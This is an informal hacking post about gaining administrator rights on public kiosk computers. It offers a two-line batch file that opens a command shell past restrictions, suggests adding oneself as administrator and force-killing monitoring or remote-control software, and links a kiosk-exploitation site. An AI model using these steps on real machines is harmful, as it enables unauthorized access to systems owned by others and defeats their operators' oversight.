Fun with physical access to public computers

There is a common source of hacking that many people overlook. It is well known that physical access is total access. That is, if an attacker has physical access to a computer, it is not your computer anymore. Usually this involves a live CD to do things like grab the SAM file or replace it, etc. I want to concentrate on a situation where you have physical access, but have limited time and privlidges. We are also assuming that you can't boot to anything else. And we are going to say that you are not allowed to use a hardware keylogger. What can you do? Well, the objective is to get admin privlidges. Then, we will own the box. So. First, lets see about a shell. In my experience, I just write a batch file. This is the common source of hackery that is overlooked sometimes. Batch files and VBS scripts don't need to be compiled and the language is simple. As long as you have notepad, you are good. Batch files are just a collection of commands to be executed by cmd.exe. It also supports if and switch statements, and several other basic programming features. VBS scripts are just visual basic scripts. Most people use visual studio to make stuff with visual basic, but you can actually get away with only notepad. There won't be a GUI, but that can be a good thing. The only way to tell that either a batch or vbs script is running is the task manager. This is only one reason why disabling the task manager for users is a bad idea. Anyway, here is the batch script that I used to get a shell whenever I needed one.
[code]
@echo off
cmd.exe
[/code]
Yes really, thats it. Even if the admin disables the ability to execute cmd.exe if you navigate to it, this will work. You can google for all kinds of interesting batch and vbs scripts. Or you can be less lame and write your own. Once you get a shell, you can add yourself as administrator. You can also kill applications that you don't want running. In my situation, you could see the processes running but could not end any of them. So if I don't want VNC or other remote control software or access restriction stuff running, you can force kill them.

Or, use this:
This is a bloody brilliant site written by paul craig. He presented it at DefCon last year. It is designed to let you exploit internet kiosks. It basically automates the process of trying every possible way to get a shell. And it works great. Be aware that the site may be nsfw because of the giant picture of a girls naked butt on the front. That is the one thing that I do not understand, because you would think that you wouldn't want to draw attention to yourself. Anyway, I am working on getting a version of his site up without the picture on it. Until then, he has released a zip file with all the code for the site in it, so you can use that. Here's the site:

http://ikat.ha.cked.net/


I also recommend watching the talk he gave at defcon here. Its almost 100Mb, but its worth it. It gives a great explanation of what exactly is going on behind the scenes.

Enjoy!